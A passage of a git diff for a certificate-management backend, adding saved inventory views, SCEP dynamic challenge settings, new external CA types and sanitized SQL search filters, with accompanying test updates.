TSystemViewFilters; + columns: null; + isSystem: true; + createdByUserId: null; +}; + +const SYSTEM_VIEWS: TSystemView[] = [ + { id: "system-all", name: "All Certificates", filters: {}, columns: null, isSystem: true, createdByUserId: null }, + { + id: "system-expiring-7d", + name: "Expiring in 7 days", + filters: { status: ["active"], notAfterTo: "+7d" }, + columns: null, + isSystem: true, + createdByUserId: null + }, + { + id: "system-expiring-30d", + name: "Expiring in 30 days", + filters: { status: ["active"], notAfterTo: "+30d" }, + columns: null, + isSystem: true, + createdByUserId: null + }, + { + id: "system-expired", + name: "Expired", + filters: { status: ["expired"] }, + columns: null, + isSystem: true, + createdByUserId: null + }, + { + id: 
"system-revoked", + name: "Revoked", + filters: { status: ["revoked"] }, + columns: null, + isSystem: true, + createdByUserId: null + }, + { + id: "system-pqc", + name: "Post-Quantum (PQC)", + filters: { keyAlgorithm: PQC_KEY_ALGORITHMS }, + columns: null, + isSystem: true, + createdByUserId: null + }, + { + id: "system-non-pqc", + name: "Classical (Non-PQC)", + filters: { keyAlgorithm: NON_PQC_KEY_ALGORITHMS }, + columns: null, + isSystem: true, + createdByUserId: null + } +]; + +type TCertificateInventoryViewServiceFactoryDep = { + certificateInventoryViewDAL: TCertificateInventoryViewDALFactory; + permissionService: Pick; +}; + +export type TCertificateInventoryViewServiceFactory = ReturnType; + +export const certificateInventoryViewServiceFactory = ({ + certificateInventoryViewDAL, + permissionService +}: TCertificateInventoryViewServiceFactoryDep) => { + const checkProjectPermission = async ( + dto: Pick & { projectId: string }, + action: ProjectPermissionActions = ProjectPermissionActions.Read + ) => { + const { permission } = await permissionService.getProjectPermission({ + actor: dto.actor, + actorId: dto.actorId, + projectId: dto.projectId, + actorAuthMethod: dto.actorAuthMethod, + actorOrgId: dto.actorOrgId, + actionProjectType: ActionProjectType.CertificateManager + }); + + ForbiddenError.from(permission).throwUnlessCan(action, ProjectPermissionSub.CertificateInventoryViews); + + return permission; + }; + + const listViews = async ({ projectId, actor, actorId, actorOrgId, actorAuthMethod }: TListInventoryViewsDTO) => { + await checkProjectPermission({ projectId, actor, actorId, actorOrgId, actorAuthMethod }); + + const allViews = await certificateInventoryViewDAL.findByProjectId(projectId, actorId); + + const sharedViews = allViews.filter((v) => v.isShared); + const customViews = allViews.filter((v) => !v.isShared); + + return { + systemViews: SYSTEM_VIEWS, + sharedViews: sharedViews.map((v) => ({ + ...v, + isSystem: false as const, + isShared: true as 
const + })), + customViews: customViews.map((v) => ({ + ...v, + isSystem: false as const, + isShared: false as const + })) + }; + }; + + const createView = async ({ + projectId, + name, + filters, + columns, + isShared = false, + actor, + actorId, + actorOrgId, + actorAuthMethod + }: TCreateInventoryViewDTO) => { + await checkProjectPermission( + { projectId, actor, actorId, actorOrgId, actorAuthMethod }, + ProjectPermissionActions.Create + ); + + try { + const view = await certificateInventoryViewDAL.create({ + projectId, + name, + filters: JSON.stringify(filters), + columns: columns ? JSON.stringify(columns) : undefined, + createdByUserId: actorId, + isShared + }); + + return view; + } catch (error) { + if (error instanceof DatabaseError && (error.error as { code?: string })?.code === "23505") { + throw new BadRequestError({ + message: isShared + ? "A shared view with this name already exists in this project" + : "You already have a view with this name" + }); + } + throw error; + } + }; + + const updateView = async ({ + viewId, + projectId, + name, + filters, + columns, + isShared, + actor, + actorId, + actorOrgId, + actorAuthMethod + }: TUpdateInventoryViewDTO) => { + await checkProjectPermission( + { projectId, actor, actorId, actorOrgId, actorAuthMethod }, + ProjectPermissionActions.Edit + ); + + const existing = await certificateInventoryViewDAL.findById(viewId); + if (!existing || existing.projectId !== projectId) { + throw new NotFoundError({ message: "View not found" }); + } + + if (existing.createdByUserId !== actorId) { + throw new BadRequestError({ message: "You can only update your own views" }); + } + + try { + const view = await certificateInventoryViewDAL.updateById(viewId, { + ...(name !== undefined && { name }), + ...(filters !== undefined && { filters: JSON.stringify(filters) }), + ...(columns !== undefined && { columns: columns ? 
JSON.stringify(columns) : null }), + ...(isShared !== undefined && { isShared }) + }); + + return view; + } catch (error) { + if (error instanceof DatabaseError && (error.error as { code?: string })?.code === "23505") { + throw new BadRequestError({ + message: isShared + ? "A shared view with this name already exists in this project" + : "You already have a view with this name" + }); + } + throw error; + } + }; + + const deleteView = async ({ + viewId, + projectId, + actor, + actorId, + actorOrgId, + actorAuthMethod + }: TDeleteInventoryViewDTO) => { + await checkProjectPermission( + { projectId, actor, actorId, actorOrgId, actorAuthMethod }, + ProjectPermissionActions.Delete + ); + + const existing = await certificateInventoryViewDAL.findById(viewId); + if (!existing || existing.projectId !== projectId) { + throw new NotFoundError({ message: "View not found" }); + } + + if (existing.createdByUserId !== actorId) { + throw new BadRequestError({ message: "You can only delete your own views" }); + } + + await certificateInventoryViewDAL.deleteById(viewId); + + return existing; + }; + + return { + listViews, + createView, + updateView, + deleteView + }; +}; diff --git a/backend/src/services/certificate-inventory-view/certificate-inventory-view-types.ts b/backend/src/services/certificate-inventory-view/certificate-inventory-view-types.ts new file mode 100644 index 00000000000..a5b941505e9 --- /dev/null +++ b/backend/src/services/certificate-inventory-view/certificate-inventory-view-types.ts @@ -0,0 +1,41 @@ +import { TProjectPermission } from "@app/lib/types"; + +export type TInventoryViewFilters = { + status?: string; + notAfterTo?: Date; + notAfterFrom?: Date; + notBeforeTo?: Date; + notBeforeFrom?: Date; + enrollmentTypes?: string[]; + keyAlgorithm?: string | string[]; + keySizes?: number[]; + caIds?: string[]; + profileIds?: string[]; + source?: string | string[]; +}; + +export type TListInventoryViewsDTO = { + projectId: string; +} & Omit; + +export type 
TCreateInventoryViewDTO = { + projectId: string; + name: string; + filters: TInventoryViewFilters; + columns?: string[]; + isShared?: boolean; +} & Omit; + +export type TUpdateInventoryViewDTO = { + viewId: string; + projectId: string; + name?: string; + filters?: TInventoryViewFilters; + columns?: string[]; + isShared?: boolean; +} & Omit; + +export type TDeleteInventoryViewDTO = { + viewId: string; + projectId: string; +} & Omit; diff --git a/backend/src/services/certificate-policy/certificate-policy-dal.ts b/backend/src/services/certificate-policy/certificate-policy-dal.ts index 4110c93f0d4..fcc21ec829b 100644 --- a/backend/src/services/certificate-policy/certificate-policy-dal.ts +++ b/backend/src/services/certificate-policy/certificate-policy-dal.ts @@ -3,6 +3,7 @@ import { Knex } from "knex"; import { TDbClient } from "@app/db"; import { TableName, TPkiCertificatePoliciesInsert } from "@app/db/schemas"; import { DatabaseError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { ormify } from "@app/lib/knex"; import { applyProcessedPermissionRulesToQuery, @@ -158,7 +159,9 @@ export const certificatePolicyDALFactory = (db: TDbClient) => { if (search) { query = query.where((builder) => { - void builder.whereILike("name", `%${search}%`).orWhereILike("description", `%${search}%`); + void builder + .whereILike("name", `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike("description", `%${sanitizeSqlLikeString(search)}%`); }); } @@ -193,7 +196,9 @@ export const certificatePolicyDALFactory = (db: TDbClient) => { if (search) { query = query.where((builder) => { - void builder.whereILike("name", `%${search}%`).orWhereILike("description", `%${search}%`); + void builder + .whereILike("name", `%${sanitizeSqlLikeString(search)}%`) + .orWhereILike("description", `%${sanitizeSqlLikeString(search)}%`); }); } diff --git a/backend/src/services/certificate-profile/certificate-profile-dal.ts 
b/backend/src/services/certificate-profile/certificate-profile-dal.ts index b0ba1f02c75..2276483277a 100644 --- a/backend/src/services/certificate-profile/certificate-profile-dal.ts +++ b/backend/src/services/certificate-profile/certificate-profile-dal.ts @@ -205,7 +205,16 @@ export const certificateProfileDALFactory = (db: TDbClient) => { db .ref("allowCertBasedRenewal") .withSchema(TableName.PkiScepEnrollmentConfig) - .as("scepConfigAllowCertBasedRenewal") + .as("scepConfigAllowCertBasedRenewal"), + db.ref("challengeType").withSchema(TableName.PkiScepEnrollmentConfig).as("scepConfigChallengeType"), + db + .ref("dynamicChallengeExpiryMinutes") + .withSchema(TableName.PkiScepEnrollmentConfig) + .as("scepConfigDynamicChallengeExpiryMinutes"), + db + .ref("dynamicChallengeMaxPending") + .withSchema(TableName.PkiScepEnrollmentConfig) + .as("scepConfigDynamicChallengeMaxPending") ) .where(`${TableName.PkiCertificateProfile}.id`, id) .first(); @@ -247,7 +256,10 @@ export const certificateProfileDALFactory = (db: TDbClient) => { raCertificatePem: result.scepConfigRaCertificate, raCertExpiresAt: result.scepConfigRaCertExpiresAt, includeCaCertInResponse: result.scepConfigIncludeCaCertInResponse ?? true, - allowCertBasedRenewal: result.scepConfigAllowCertBasedRenewal ?? true + allowCertBasedRenewal: result.scepConfigAllowCertBasedRenewal ?? 
true, + challengeType: result.scepConfigChallengeType, + dynamicChallengeExpiryMinutes: result.scepConfigDynamicChallengeExpiryMinutes, + dynamicChallengeMaxPending: result.scepConfigDynamicChallengeMaxPending } as TCertificateProfileWithConfigs["scepConfig"]) : undefined; @@ -430,7 +442,16 @@ export const certificateProfileDALFactory = (db: TDbClient) => { .ref("includeCaCertInResponse") .withSchema(TableName.PkiScepEnrollmentConfig) .as("scepIncludeCaCertInResponse"), - db.ref("allowCertBasedRenewal").withSchema(TableName.PkiScepEnrollmentConfig).as("scepAllowCertBasedRenewal") + db.ref("allowCertBasedRenewal").withSchema(TableName.PkiScepEnrollmentConfig).as("scepAllowCertBasedRenewal"), + db.ref("challengeType").withSchema(TableName.PkiScepEnrollmentConfig).as("scepChallengeType"), + db + .ref("dynamicChallengeExpiryMinutes") + .withSchema(TableName.PkiScepEnrollmentConfig) + .as("scepDynamicChallengeExpiryMinutes"), + db + .ref("dynamicChallengeMaxPending") + .withSchema(TableName.PkiScepEnrollmentConfig) + .as("scepDynamicChallengeMaxPending") ); if (processedRules) { @@ -479,7 +500,10 @@ export const certificateProfileDALFactory = (db: TDbClient) => { raCertificatePem: result.scepRaCertificate as string, raCertExpiresAt: result.scepRaCertExpiresAt as Date, includeCaCertInResponse: (result.scepIncludeCaCertInResponse as boolean) ?? true, - allowCertBasedRenewal: (result.scepAllowCertBasedRenewal as boolean) ?? true + allowCertBasedRenewal: (result.scepAllowCertBasedRenewal as boolean) ?? 
true, + challengeType: result.scepChallengeType as string, + dynamicChallengeExpiryMinutes: result.scepDynamicChallengeExpiryMinutes as number, + dynamicChallengeMaxPending: result.scepDynamicChallengeMaxPending as number } : undefined; diff --git a/backend/src/services/certificate-profile/certificate-profile-external-config-schemas.ts b/backend/src/services/certificate-profile/certificate-profile-external-config-schemas.ts index 7ffdc896494..f1542367f84 100644 --- a/backend/src/services/certificate-profile/certificate-profile-external-config-schemas.ts +++ b/backend/src/services/certificate-profile/certificate-profile-external-config-schemas.ts @@ -22,6 +22,21 @@ export const AcmeExternalConfigSchema = z.object({}); */ export const AwsPcaExternalConfigSchema = z.object({}); +/** + * External configuration schema for DigiCert Certificate Authority + */ +export const DigiCertExternalConfigSchema = z.object({}); + +/** + * External configuration schema for AWS ACM Public Certificate Authority + */ +export const AwsAcmPublicCaExternalConfigSchema = z.object({}); + +/** + * External configuration schema for Venafi TPP Certificate Authority + */ +export const VenafiTppExternalConfigSchema = z.object({}); + /** * Map of CA types to their corresponding external configuration schemas */ @@ -29,6 +44,9 @@ export const ExternalConfigSchemaMap = { [CaType.AZURE_AD_CS]: AzureAdCsExternalConfigSchema, [CaType.ACME]: AcmeExternalConfigSchema, [CaType.AWS_PCA]: AwsPcaExternalConfigSchema, + [CaType.DIGICERT]: DigiCertExternalConfigSchema, + [CaType.AWS_ACM_PUBLIC_CA]: AwsAcmPublicCaExternalConfigSchema, + [CaType.VENAFI_TPP]: VenafiTppExternalConfigSchema, [CaType.INTERNAL]: z.object({}).optional() // Internal CAs don't use external configs } as const; @@ -49,7 +67,15 @@ export const createExternalConfigSchema = (caType?: CaType | null) => { * Union type of all possible external configuration schemas */ export const ExternalConfigUnionSchema = z - 
.union([AzureAdCsExternalConfigSchema, AcmeExternalConfigSchema, AwsPcaExternalConfigSchema, z.object({})]) + .union([ + AzureAdCsExternalConfigSchema, + AcmeExternalConfigSchema, + AwsPcaExternalConfigSchema, + DigiCertExternalConfigSchema, + AwsAcmPublicCaExternalConfigSchema, + VenafiTppExternalConfigSchema, + z.object({}) + ]) .nullable() .optional(); diff --git a/backend/src/services/certificate-profile/certificate-profile-service.test.ts b/backend/src/services/certificate-profile/certificate-profile-service.test.ts index d7739441a10..b9bdd39d651 100644 --- a/backend/src/services/certificate-profile/certificate-profile-service.test.ts +++ b/backend/src/services/certificate-profile/certificate-profile-service.test.ts @@ -271,6 +271,7 @@ describe("CertificateProfileService", () => { estEnrollmentConfigDAL: mockEstEnrollmentConfigDAL, acmeEnrollmentConfigDAL: mockAcmeEnrollmentConfigDAL, scepEnrollmentConfigDAL: mockScepEnrollmentConfigDAL, + scepDynamicChallengeDAL: { deleteByConfigId: vi.fn() }, certificateBodyDAL: mockCertificateBodyDAL, certificateSecretDAL: mockCertificateSecretDAL, certificateAuthorityDAL: mockCertificateAuthorityDAL, diff --git a/backend/src/services/certificate-profile/certificate-profile-service.ts b/backend/src/services/certificate-profile/certificate-profile-service.ts index dc392b5c8e5..1a0cf859a48 100644 --- a/backend/src/services/certificate-profile/certificate-profile-service.ts +++ b/backend/src/services/certificate-profile/certificate-profile-service.ts @@ -9,6 +9,8 @@ import { ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { buildUrl } from "@app/ee/services/pki-acme/pki-acme-fns"; +import { ScepChallengeType } from "@app/ee/services/pki-scep/challenge"; +import { TScepDynamicChallengeDALFactory } from "@app/ee/services/pki-scep/pki-scep-dynamic-challenge-dal"; import { generateRaCertificate } from "@app/ee/services/pki-scep/pki-scep-fns"; import { getProcessedPermissionRules } from 
"@app/lib/casl/permission-filter-utils"; import { extractX509CertFromChain } from "@app/lib/certificates/extract-certificate"; @@ -99,6 +101,20 @@ const validateTemplateByExternalCaType = ( } }; +const validateAcmEnrollmentType = async ( + caId: string | null | undefined, + enrollmentType: EnrollmentType, + externalCertificateAuthorityDAL: Pick +) => { + if (!caId) return; + const externalCa = await externalCertificateAuthorityDAL.findOne({ caId }); + if (externalCa?.type === CaType.AWS_ACM_PUBLIC_CA && enrollmentType !== EnrollmentType.API) { + throw new ForbiddenRequestError({ + message: "AWS Certificate Manager only supports API enrollment" + }); + } +}; + const validateExternalConfigs = async ( externalConfigs: Record | null | undefined, caId: string | null, @@ -241,6 +257,7 @@ type TCertificateProfileServiceFactoryDep = { estEnrollmentConfigDAL: TEstEnrollmentConfigDALFactory; acmeEnrollmentConfigDAL: TAcmeEnrollmentConfigDALFactory; scepEnrollmentConfigDAL: TScepEnrollmentConfigDALFactory; + scepDynamicChallengeDAL: Pick; certificateBodyDAL: Pick; certificateSecretDAL: Pick; certificateAuthorityDAL: Pick; @@ -284,6 +301,7 @@ export const certificateProfileServiceFactory = ({ estEnrollmentConfigDAL, acmeEnrollmentConfigDAL, scepEnrollmentConfigDAL, + scepDynamicChallengeDAL, certificateBodyDAL, certificateSecretDAL, certificateAuthorityDAL, @@ -323,11 +341,6 @@ export const certificateProfileServiceFactory = ({ }) ); - const project = await projectDAL.findById(projectId); - if (!project) { - throw new NotFoundError({ message: "Project not found" }); - } - // Validate that certificate policy exists and belongs to the same project if (data.certificatePolicyId) { const policy = await certificatePolicyDAL.findById(data.certificatePolicyId); @@ -351,6 +364,8 @@ export const certificateProfileServiceFactory = ({ validateIssuerTypeConstraints(data.issuerType, data.enrollmentType, data.caId ?? 
null); + await validateAcmEnrollmentType(data.caId, data.enrollmentType, externalCertificateAuthorityDAL); + // Validate defaults against policy constraints if (data.defaults && data.certificatePolicyId) { const policy = await certificatePolicyDAL.findById(data.certificatePolicyId); @@ -414,9 +429,12 @@ export const certificateProfileServiceFactory = ({ encryptedRaPrivateKey: Buffer; raCertificatePem: string; raCertExpiresAt: Date; - hashedChallengePassword: string; + hashedChallengePassword: string | null; + challengeType: string; includeCaCertInResponse: boolean; allowCertBasedRenewal: boolean; + dynamicChallengeExpiryMinutes: number | null; + dynamicChallengeMaxPending: number | null; } | undefined; @@ -433,18 +451,28 @@ export const certificateProfileServiceFactory = ({ plainText: Buffer.from(raCert.privateKeyDer) }); - const appCfg = getConfig(); - const hashedChallengePassword = await crypto - .hashing() - .createHash(data.scepConfig.challengePassword, appCfg.SALT_ROUNDS); + const challengeType = (data.scepConfig.challengeType as ScepChallengeType) || ScepChallengeType.STATIC; + let hashedChallengePassword: string | null = null; + + if (challengeType === ScepChallengeType.STATIC && data.scepConfig.challengePassword) { + const appCfg = getConfig(); + hashedChallengePassword = await crypto + .hashing() + .createHash(data.scepConfig.challengePassword, appCfg.SALT_ROUNDS); + } precomputedScepConfig = { encryptedRaPrivateKey, raCertificatePem: raCert.certificatePem, raCertExpiresAt: raCert.expiresAt, hashedChallengePassword, + challengeType, includeCaCertInResponse: data.scepConfig.includeCaCertInResponse ?? true, - allowCertBasedRenewal: data.scepConfig.allowCertBasedRenewal ?? true + allowCertBasedRenewal: data.scepConfig.allowCertBasedRenewal ?? true, + dynamicChallengeExpiryMinutes: + challengeType === ScepChallengeType.DYNAMIC ? (data.scepConfig.dynamicChallengeExpiryMinutes ?? 
60) : null, + dynamicChallengeMaxPending: + challengeType === ScepChallengeType.DYNAMIC ? (data.scepConfig.dynamicChallengeMaxPending ?? 100) : null }; } @@ -507,8 +535,11 @@ export const certificateProfileServiceFactory = ({ raCertificate: precomputedScepConfig.raCertificatePem, raCertExpiresAt: precomputedScepConfig.raCertExpiresAt, hashedChallengePassword: precomputedScepConfig.hashedChallengePassword, + challengeType: precomputedScepConfig.challengeType, includeCaCertInResponse: precomputedScepConfig.includeCaCertInResponse, - allowCertBasedRenewal: precomputedScepConfig.allowCertBasedRenewal + allowCertBasedRenewal: precomputedScepConfig.allowCertBasedRenewal, + dynamicChallengeExpiryMinutes: precomputedScepConfig.dynamicChallengeExpiryMinutes, + dynamicChallengeMaxPending: precomputedScepConfig.dynamicChallengeMaxPending }, tx ); @@ -601,6 +632,8 @@ export const certificateProfileServiceFactory = ({ validateIssuerTypeConstraints(finalIssuerType, finalEnrollmentType, finalCaId ?? null, existingProfile.caId); + await validateAcmEnrollmentType(finalCaId, finalEnrollmentType, externalCertificateAuthorityDAL); + // Validate external configs only if they are provided in the update if (data.externalConfigs !== undefined) { await validateExternalConfigs( @@ -710,13 +743,38 @@ export const certificateProfileServiceFactory = ({ } if (scepConfig && existingProfile.scepConfigId) { + const existingScepConfig = await scepEnrollmentConfigDAL.findById(existingProfile.scepConfigId, tx); + const scepUpdateData: { - hashedChallengePassword?: string; + hashedChallengePassword?: string | null; + challengeType?: string; includeCaCertInResponse?: boolean; allowCertBasedRenewal?: boolean; + dynamicChallengeExpiryMinutes?: number | null; + dynamicChallengeMaxPending?: number | null; } = {}; - if (scepConfig.challengePassword) { + if (scepConfig.challengeType !== undefined) { + scepUpdateData.challengeType = scepConfig.challengeType; + if (scepConfig.challengeType === 
ScepChallengeType.DYNAMIC) { + scepUpdateData.hashedChallengePassword = null; + scepUpdateData.dynamicChallengeExpiryMinutes = scepConfig.dynamicChallengeExpiryMinutes ?? 60; + scepUpdateData.dynamicChallengeMaxPending = scepConfig.dynamicChallengeMaxPending ?? 100; + } + if (scepConfig.challengeType === ScepChallengeType.STATIC) { + // Require password when switching from dynamic to static + const isSwitchingFromDynamic = existingScepConfig?.challengeType === ScepChallengeType.DYNAMIC; + if (isSwitchingFromDynamic && !scepConfig.challengePassword) { + throw new BadRequestError({ + message: "Switching to static challenge type requires providing a challenge password" + }); + } + await scepDynamicChallengeDAL.deleteByConfigId(existingProfile.scepConfigId, tx); + scepUpdateData.dynamicChallengeExpiryMinutes = null; + scepUpdateData.dynamicChallengeMaxPending = null; + } + } + if (scepConfig.challengePassword && scepUpdateData.challengeType !== ScepChallengeType.DYNAMIC) { scepUpdateData.hashedChallengePassword = await crypto .hashing() .createHash(scepConfig.challengePassword, getConfig().SALT_ROUNDS); @@ -727,6 +785,12 @@ export const certificateProfileServiceFactory = ({ if (scepConfig.allowCertBasedRenewal !== undefined) { scepUpdateData.allowCertBasedRenewal = scepConfig.allowCertBasedRenewal; } + if (scepUpdateData.challengeType === undefined && scepConfig.dynamicChallengeExpiryMinutes !== undefined) { + scepUpdateData.dynamicChallengeExpiryMinutes = scepConfig.dynamicChallengeExpiryMinutes; + } + if (scepUpdateData.challengeType === undefined && scepConfig.dynamicChallengeMaxPending !== undefined) { + scepUpdateData.dynamicChallengeMaxPending = scepConfig.dynamicChallengeMaxPending; + } if (Object.keys(scepUpdateData).length > 0) { await scepEnrollmentConfigDAL.updateById(existingProfile.scepConfigId, scepUpdateData, tx); } @@ -839,6 +903,12 @@ export const certificateProfileServiceFactory = ({ const appCfg = getConfig(); const siteUrl = appCfg.SITE_URL ?? 
""; profile.scepConfig.scepEndpointUrl = `${siteUrl}/scep/${profile.id}/pkiclient.exe`; + if (profile.scepConfig.challengeType === ScepChallengeType.DYNAMIC) { + profile.scepConfig.challengeEndpointUrl = `${siteUrl}/scep/${profile.id}/challenge`; + } else { + delete profile.scepConfig.dynamicChallengeExpiryMinutes; + delete profile.scepConfig.dynamicChallengeMaxPending; + } } // Parse externalConfigs from JSON string to object if it exists @@ -1017,7 +1087,16 @@ export const certificateProfileServiceFactory = ({ ? { ...profileWithConfigs.acmeConfig, directoryUrl: buildUrl(profile.id, "/directory") } : undefined, scepConfig: profileWithConfigs.scepConfig - ? { ...profileWithConfigs.scepConfig, scepEndpointUrl: `${siteUrl}/scep/${profile.id}/pkiclient.exe` } + ? { + ...profileWithConfigs.scepConfig, + scepEndpointUrl: `${siteUrl}/scep/${profile.id}/pkiclient.exe`, + ...(profileWithConfigs.scepConfig.challengeType === ScepChallengeType.DYNAMIC + ? { challengeEndpointUrl: `${siteUrl}/scep/${profile.id}/challenge` } + : { + dynamicChallengeExpiryMinutes: undefined, + dynamicChallengeMaxPending: undefined + }) + } : undefined }; diff --git a/backend/src/services/certificate-profile/certificate-profile-types.ts b/backend/src/services/certificate-profile/certificate-profile-types.ts index 5d38505e466..213750fc0fb 100644 --- a/backend/src/services/certificate-profile/certificate-profile-types.ts +++ b/backend/src/services/certificate-profile/certificate-profile-types.ts @@ -80,9 +80,12 @@ export type TCertificateProfileUpdate = Omit< skipEabBinding?: boolean; }; scepConfig?: { + challengeType?: string; challengePassword?: string; includeCaCertInResponse?: boolean; allowCertBasedRenewal?: boolean; + dynamicChallengeExpiryMinutes?: number; + dynamicChallengeMaxPending?: number; }; }; @@ -130,6 +133,10 @@ export type TCertificateProfileWithConfigs = TCertificateProfile & { raCertExpiresAt: Date; includeCaCertInResponse: boolean; allowCertBasedRenewal: boolean; + challengeType: 
string; + challengeEndpointUrl?: string; + dynamicChallengeExpiryMinutes?: number; + dynamicChallengeMaxPending?: number; }; }; diff --git a/backend/src/services/certificate-request/certificate-request-dal.ts b/backend/src/services/certificate-request/certificate-request-dal.ts index 2ed557a39ba..6694e123114 100644 --- a/backend/src/services/certificate-request/certificate-request-dal.ts +++ b/backend/src/services/certificate-request/certificate-request-dal.ts @@ -9,6 +9,7 @@ import { applyProcessedPermissionRulesToQuery, type ProcessedPermissionRules } from "@app/lib/knex/permission-filter-utils"; +import { CaStatus } from "@app/services/certificate-authority/certificate-authority-enums"; import { applyMetadataFilter } from "@app/services/resource-metadata/resource-metadata-fns"; import { CertificateRequestStatus } from "./certificate-request-types"; @@ -393,10 +394,44 @@ export const certificateRequestDALFactory = (db: TDbClient) => { } }; + const findPendingValidationByCaType = async ( + caType: string, + options: { limit?: number; afterCreatedAt?: Date } = {} + ): Promise => { + try { + const query = db(TableName.CertificateRequests) + .join( + TableName.CertificateAuthority, + `${TableName.CertificateRequests}.caId`, + `${TableName.CertificateAuthority}.id` + ) + .join( + TableName.ExternalCertificateAuthority, + `${TableName.CertificateAuthority}.id`, + `${TableName.ExternalCertificateAuthority}.caId` + ) + .where(`${TableName.CertificateRequests}.status`, CertificateRequestStatus.PENDING_VALIDATION) + .where(`${TableName.ExternalCertificateAuthority}.type`, caType) + .where(`${TableName.CertificateAuthority}.status`, CaStatus.ACTIVE) + .select(selectAllTableCols(TableName.CertificateRequests)) + .orderBy(`${TableName.CertificateRequests}.createdAt`, "asc"); + + if (options.afterCreatedAt) { + void query.where(`${TableName.CertificateRequests}.createdAt`, ">", options.afterCreatedAt); + } + if (options.limit) void query.limit(options.limit); + + return (await 
query) as TCertificateRequests[]; + } catch (error) { + throw new DatabaseError({ error, name: "Find pending validation certificate requests by CA type" }); + } + }; + return { ...certificateRequestOrm, findByIdWithCertificate, findPendingByProjectId, + findPendingValidationByCaType, updateStatus, attachCertificate, findByProjectId, diff --git a/backend/src/services/certificate-request/certificate-request-service.test.ts b/backend/src/services/certificate-request/certificate-request-service.test.ts index 37a922475e5..96c19af49ea 100644 --- a/backend/src/services/certificate-request/certificate-request-service.test.ts +++ b/backend/src/services/certificate-request/certificate-request-service.test.ts @@ -57,7 +57,7 @@ describe("CertificateRequestService", () => { certificateDAL: mockCertificateDAL, certificateService: mockCertificateService, permissionService: mockPermissionService, - resourceMetadataDAL: { find: vi.fn().mockResolvedValue([]) } + resourceMetadataDAL: { find: vi.fn().mockResolvedValue([]), insertMany: vi.fn() } }); }); diff --git a/backend/src/services/certificate-request/certificate-request-service.ts b/backend/src/services/certificate-request/certificate-request-service.ts index cbf12187af0..7b8c892dd83 100644 --- a/backend/src/services/certificate-request/certificate-request-service.ts +++ b/backend/src/services/certificate-request/certificate-request-service.ts @@ -32,7 +32,7 @@ type TCertificateRequestServiceFactoryDep = { certificateDAL: Pick; certificateService: Pick; permissionService: Pick; - resourceMetadataDAL: Pick; + resourceMetadataDAL: Pick; }; export type TCertificateRequestServiceFactory = ReturnType; @@ -433,10 +433,12 @@ export const certificateRequestServiceFactory = ({ certificateRequestDAL.countByProjectId(projectId, options, processedRules) ]); - const mappedCertificateRequests = certificateRequests.map((request) => ({ - ...request, - status: request.status as CertificateRequestStatus - })); + const mappedCertificateRequests = 
certificateRequests.map( + ({ encryptedPrivateKey: _encryptedPrivateKey, ...request }) => ({ + ...request, + status: request.status as CertificateRequestStatus + }) + ); return { certificateRequests: mappedCertificateRequests, diff --git a/backend/src/services/certificate-v3/certificate-approval-fns.ts b/backend/src/services/certificate-v3/certificate-approval-fns.ts index ef1139dc526..36f07812fab 100644 --- a/backend/src/services/certificate-v3/certificate-approval-fns.ts +++ b/backend/src/services/certificate-v3/certificate-approval-fns.ts @@ -14,6 +14,7 @@ import { TCertificateBodyDALFactory } from "@app/services/certificate/certificat import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; import { TCertificateSecretDALFactory } from "@app/services/certificate/certificate-secret-dal"; import { CertKeyAlgorithm, CertSignatureAlgorithm, CertStatus } from "@app/services/certificate/certificate-types"; +import { validateAcmIssuanceInputs } from "@app/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-fns"; import { TCertificateAuthorityDALFactory } from "@app/services/certificate-authority/certificate-authority-dal"; import { CaType } from "@app/services/certificate-authority/certificate-authority-enums"; import { TCertificateIssuanceQueueFactory } from "@app/services/certificate-authority/certificate-issuance-queue"; @@ -438,16 +439,39 @@ export const certificateApprovalServiceFactory = ( const caType = (targetCa.externalCa?.type as CaType) ?? 
CaType.INTERNAL; - if (caType !== CaType.ACME && caType !== CaType.AZURE_AD_CS && caType !== CaType.AWS_PCA) { + if ( + caType !== CaType.ACME && + caType !== CaType.AZURE_AD_CS && + caType !== CaType.AWS_PCA && + caType !== CaType.AWS_ACM_PUBLIC_CA && + caType !== CaType.VENAFI_TPP + ) { return null; } + // Pre-flight validation for ACM β€” fail the approval synchronously rather than + // letting the job produce a FAILED request row after the approver already accepted. + if (caType === CaType.AWS_ACM_PUBLIC_CA) { + validateAcmIssuanceInputs({ + csr: certRequest.csr || undefined, + keyAlgorithm: certRequest.keyAlgorithm || undefined, + altNames: altNames ?? undefined, + ttl, + organization: certRequest.organization || undefined, + organizationalUnit: certRequest.organizationalUnit || undefined, + country: certRequest.country || undefined, + state: certRequest.state || undefined, + locality: certRequest.locality || undefined + }); + } + const orderId = randomUUID(); await certificateIssuanceQueue.queueCertificateIssuance({ certificateId: orderId, profileId: profile.id, caId: profile.caId || "", + caType, ttl: ttl || "1y", signatureAlgorithm: certRequest.signatureAlgorithm || "", keyAlgorithm: certRequest.keyAlgorithm || "", diff --git a/backend/src/services/certificate-v3/certificate-v3-service.test.ts b/backend/src/services/certificate-v3/certificate-v3-service.test.ts index 9762672b13a..8f9bcec0dda 100644 --- a/backend/src/services/certificate-v3/certificate-v3-service.test.ts +++ b/backend/src/services/certificate-v3/certificate-v3-service.test.ts @@ -2251,6 +2251,51 @@ describe("CertificateV3Service", () => { ).rejects.toThrow("Certificate is not eligible for auto-renewal: certificate has already been renewed"); }); + it("should reject update with accurate enrollment type when profile is ACME", async () => { + const mockCert = { + id: "cert-123", + profileId: "profile-123", + renewedByCertificateId: null, + notBefore: new Date(), + notAfter: new Date(Date.now() 
